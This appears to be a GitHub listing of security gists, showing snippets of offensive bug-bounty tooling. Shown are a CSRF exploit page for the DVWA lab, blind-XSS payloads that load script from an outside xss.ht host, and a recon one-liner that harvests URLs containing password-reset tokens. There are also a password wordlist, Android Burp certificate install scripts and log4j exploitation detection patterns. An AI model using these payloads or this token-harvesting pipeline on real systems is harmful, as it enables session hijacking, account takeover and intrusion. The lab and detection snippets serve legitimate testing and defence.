Skip to content

Instantly share code, notes, and snippets.

View secfb's full-sized avatar

Never Mind secfb

74 followers · 495 following
View GitHub Profile
@StackZeroSec
StackZeroSec / csrf_dvwa_high.html
Created November 23, 2022 04:18
The CSRF exploit for DVWA with high level of security, it can be loaded thanks to the file upload vulnerability.
<!DOCTYPE html>
<html>
<head>
<meta charset='utf-8'>
<meta http-equiv='X-UA-Compatible' content='IE=edge'>
<title>Malicious File</title>
</head>
<body onload="change_password()">
@cihanmehmet
cihanmehmet / ports.md
Last active October 24, 2022 12:05
TCP PORTS List

Most Popular TCP/UDP Ports

https://nmap.org/book/port-scanning.html#most-popular-ports

20,21,22,23,25,53,67,68,69,80,110,111,123,135,137,138,139,143,161,162,443,445,500,514,520,631,993,995,1434,1723,1900,3306,3389,4500,5900,8080,49152
20 21 22 23 25 53 67 68 69 80 110 111 123 135 137 138 139 143 161 162 443 445 500 514 520 631 993 995 1434 1723 1900 3306 3389 4500 5900 8080 49152
@kannthu
kannthu / swagger-ui nuclei module
Created August 10, 2022 10:06
id: swagger-ui
info:
name: Swagger UI
author: vidocsecurity
severity: low
description: Swagger UI exposes information about endpoints and sometimes it is vulnerable tu XSS
tags: swagger-ui,exposure
requests:
@Huntinex
Huntinex / bxss-payload.txt
Created August 1, 2022 13:40
"><script src=https://username.xss.ht></script>
'><script src=https://username.xss.ht></script>
";eval('var a=document.createElement(\'script\');a.src=\'https://username.xss.ht\';document.body.appendChild(a)')
@R0X4R
R0X4R / tweets.txt
Created February 12, 2022 15:30
tweets collection
subfinder -d target.com -all -silent -t 10 | naabu -p "21,22,80,81,280,300,443,583,591,593,832,981,1010,1099,1311,2082,2087,2095,2096,2480,3000,3128,3333,4243,4444,4445,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7002,7396,7474,8000,8001,8008,8009,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8530,8531,8834,8880,8887,8888,8983,9000,9001,9043,9060,9080,9090,9091,9092,9200,9443,9502,9800,9981,10000,10250,10443,11371,12043,12046,12443,15672,16080,17778,18091,18092,20720,28017,32000,55440,55672" -silent -nc | httprobe -prefer-https | xargs -P 10 -I @ bash -c "echo @ | gau" 2> /dev/null | grep -E "password|password\-reset|reset\-token|token\=" | anew -q urls.txt
xargs -a urls.txt -P 5 -I @ bash -c "curl -ks -L \"@\" -H \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36\" | grep -iE \"enter password|new password|new\-password|confirm password|co
@Neo23x0
Neo23x0 / log4j_rce_detection.md
Last active January 28, 2024 08:19
Log4j RCE CVE-2021-44228 Exploitation Detection

log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders

sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
@defparam
defparam / cluster.py
Last active December 15, 2023 10:19
Gist of the Day: Turbo Intruder Cluster Bomb with SmartFiltering
# Gist of the Day: Turbo Intruder Cluster Bomb with SmartFiltering
# Author: Evan Custodio (@defparam)
#
# MIT License
# Copyright 2021 Evan Custodio
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
@cihanmehmet
cihanmehmet / android-burp-cert.sh
Last active May 29, 2023 12:14
Andorid 7-10 Burpsuite Certificate İnstall
#!/usr/bin/env bash
wget -e use_proxy=yes -e http_proxy=127.0.0.1:8080 http://burp/cert -O cacert.der #open burp suite | Proxy > Options > CA Certificate > Export in DER format
#openssl x509 -inform DER -in cacert.der -out cacert.pem
cp cacert.pem $(openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1)".0" #9a5ba575.0
#--------------------------------------------------------------------------------------------------------
adb root
adb remount
adb push 9a5ba575.0 /sdcard/
#--------------------------------------------------------------------------------------------------------
adb shell cp /sdcard/9a5ba575.0 /system/etc/security/cacerts/
@cihanmehmet
cihanmehmet / password-wordlist.txt
Created November 19, 2020 11:34
Password Wordlist(235k)
This file has been truncated, but you can view the full file.
password
princess
123456
sunshine
princess1
abc123
jordan23
blessed1
Password1
password1
@dwisiswant0
dwisiswant0 / install_burp_cert.sh
Created November 13, 2020 18:45
10-line to Install BurpSuite Certificate on Android 7+
#!/bin/bash
curl -s http://burp/cert -x http://127.0.0.1:8080 -o cacert.der
openssl x509 -inform DER -in cacert.der -out cacert.pem
export CERT_HASH=$(openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1)
adb root && adb remount
adb push cacert.pem "/sdcard/${CERT_HASH}.0"
adb shell su -c "mv /sdcard/${CERT_HASH}.0 /system/etc/security/cacerts"
adb shell su -c "chmod 644 /system/etc/security/cacerts/${CERT_HASH}.0"
rm -rf cacert.*